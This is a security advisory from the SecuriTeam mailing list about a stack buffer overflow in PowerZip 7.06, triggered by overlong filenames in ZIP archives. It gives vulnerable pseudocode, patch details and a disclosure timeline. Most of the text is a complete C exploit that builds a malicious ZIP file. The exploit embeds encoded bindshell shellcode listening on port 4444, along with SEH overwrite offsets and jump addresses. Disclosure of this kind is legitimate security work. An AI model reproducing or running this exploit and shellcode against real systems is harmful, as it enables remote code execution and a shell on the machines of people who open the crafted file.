[NT] PowerZip Buffer Overflow and Exploit

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



PowerZip Buffer Overflow and Exploit
------------------------------------------------------------------------


SUMMARY

A vulnerability has been found in <http://www.powerzip.biz/> PowerZip.
Exploited, the vulnerability allows execution of arbitrary code when the
user opens a malicious ZIP archive.

In order to exploit this vulnerability successfully, the user must be
convinced to open a malicious ZIP file.

DETAILS

Vulnerable Systems:
* PowerZip version 7.06 Build 3895.

Immune Systems:
* PowerZip version 7.07 Build 3901.

The stack-based buffer overflow occurs when PowerZip is processing an
archive that contains a file with an overly long filename. It is possible
to exploit the buffer overflow to execute arbitrary code on Windows 2000
SP4 via a malicious ZIP file. On Windows XP SP2 systems, PowerZip will be
terminated by the Data Execution Prevention (DEP) feature.

The buffer overflow occurs in a function that resembles the following in
PowerZip.exe.

Vulnerable code:
func_50E1A0(arg_0, .., .., ..)
{
...
CString nameOfCompressedFile;
LVCOLUMN lvc;
...
lvc.mask = LVCF_SUBITEM;
SendMessage(hWnd, LVM_GETCOLUMN, arg_0->iCol, &lvc);
...
if(arg_0->someFlag != 1)
{
switch(lvc.iSubItem)
{
case 0:
if(arg_0->someStruct->someStruct2->someFlag != 0)
{
nameOfCompressedFile =
arg_0->someStruct->someStruct2->compressedFilenameCString;
}
else
...
break;
case 1:
CDTPath

var_180(arg_0->someStruct->someStruct2->CDTTimeVar.GetShortDate());
...
...
break;
case 2:
break;
...
...
...
}

// This causes a stack-based buffer overflow when the name of a
compressed
// file (from a ZIP archive) is overly long.

strcpy(arg_0->stackBuffer, nameOfCompressedFile->GetBuffer(0));

nameOfCompressedFile->ReleaseBuffer(-1);
...
...
}
...
...
}

Patch Availability:
<http://www.powerzip.biz/download.aspx> Update to version 7.07 Build
3901.

Disclosure Timeline:
* 2006-08-10 - Vulnerability Discovered.
* 2006-08-12 - Initial Vendor Notification.
* 2006-08-12 - Initial Vendor Reply.
* 2006-08-18 - Vendor Released Fixed Version.
* 2006-08-23 - Public Release.

Exploit by bratax:
/*
PowerZip 7.06 Exploit by bratax (http://www.bratax.be/)

Just a quick one as I was able to reuse most of my zipcentral eploit
code..
Greetz to everyone I like...(special greetz to mobbie and DT as they were
sad
I didn't mention them the previous time :p)

******************************

Some technical info:
- Original advisory + vulnerability details are available here:
http://vuln.sg/powerzip706-en.html (I didn't notice anything like DEP
tho?)
- some code might look weird in this source.. (e.g. shellcode,
offsets,...)
this is because a lot of values are changed in memory.. so use your
favorite
debugger to see the real values and codes
- tested on XP Pro English (SP2) and XP Home Dutch (SP2)
!! sometimes it works, sometimes it doesn't... (throws exception E06D7363
when
it doesn't)... just try over and over and over..... and over.... and
over...
and over again till it works.. :p sometimes it works 10 times in a row
and
sometimes you have to try 10 times before it works 1 time.. I'm going
to
investigate this weekend why this is happening.. but now it's time to
relax
and drink some beers :)

*/

#include <stdio.h>
#include <string.h>

unsigned char scode[]= //bindshell on p4444 (thx metasploit)
"\x89\x03\x59\x89\x05\x8a\x9b\x98\x98\x98\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
"\x4e\x46\x46\x42\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x37"
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x38"
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x58"
"\x49\x48\x4e\x56\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d"
"\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x48\x42\x44\x4e\x50\x4b\x38"
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x45\x4a\x36"
"\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46"
"\x43\x45\x48\x56\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x37\x43\x37"
"\x44\x43\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x36\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45"
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43\x54"
"\x43\x55\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x41"
"\x4e\x45\x48\x56\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a"
"\x4c\x31\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41"
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d"
"\x42\x35\x46\x55\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x36"
"\x47\x4e\x49\x47\x48\x4c\x49\x57\x47\x45\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x36\x48\x36\x4a\x56\x43\x46"
"\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x45\x49\x35\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x34\x4e\x52"
"\x43\x39\x4d\x38\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f"
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4c\x36"
"\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x46"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";


char head[] = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00"
"\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x14\x08\x00";
char middle[] = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00"
"\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x14\x08\x00\x00\x00\x00\x00\x00"
"\x01\x00\x24\x00\x00\x00\x00\x00\x00";
char tail[] = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00"
"\x00\x00\x01\x00\x01\x00\x42\x08\x00\x00"
"\x32\x08\x00\x00\x00";

int main(int argc,char *argv[])
{
char overflow[2064]; // exactly 2064....... wonder why?

FILE *vuln;
if(argc == 1)
{
printf("PowerZip 7.06 Buffer Overflow Exploit.\n");
printf("Coded by bratax (http://www.bratax.be/).\n");
printf("Usage: %s <outputfile>\n",argv[0]);
return 0;
}
vuln = fopen(argv[1],"w");

//build overflow buffer here.
memset(overflow,0x32,sizeof(overflow)); //fill with crap
//memcpy(overflow+787, scode, 483);
memcpy(overflow+787, scode, 709);
memcpy(overflow+1620, "\x41\x49\x89\x04", 4); // jmp over pop pop ret
memcpy(overflow+1624, "\x02\x12\x01\x61", 4); // pop pop ret @ 0x61011202
memcpy(overflow+1628, "\x82\xFD\x81\x98\x98", 5); // jmp back to shellcode


if(vuln)
{
//Write file
fwrite(head, 1, sizeof(head), vuln);
fwrite(overflow, 1, sizeof(overflow), vuln);
fwrite(middle, 1, sizeof(middle), vuln);
fwrite(overflow, 1, sizeof(overflow), vuln);
fwrite(tail, 1, sizeof(tail), vuln);
fclose(vuln);
}
printf("File written.\nOpen with PowerZip 7.06 to exploit.\n");
return 0;
}


ADDITIONAL INFORMATION

The information has been provided by <http://www.bratax.be/> bratax,
<mailto:chewkeong@xxxxxxx> Tan Chew Keong.

The original article(s) can be found at:
<http://vuln.sg/powerzip706-en.html> http://vuln.sg/powerzip706-en.html,
<http://www.milw0rm.com/exploits/2286>
http://www.milw0rm.com/exploits/2286



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages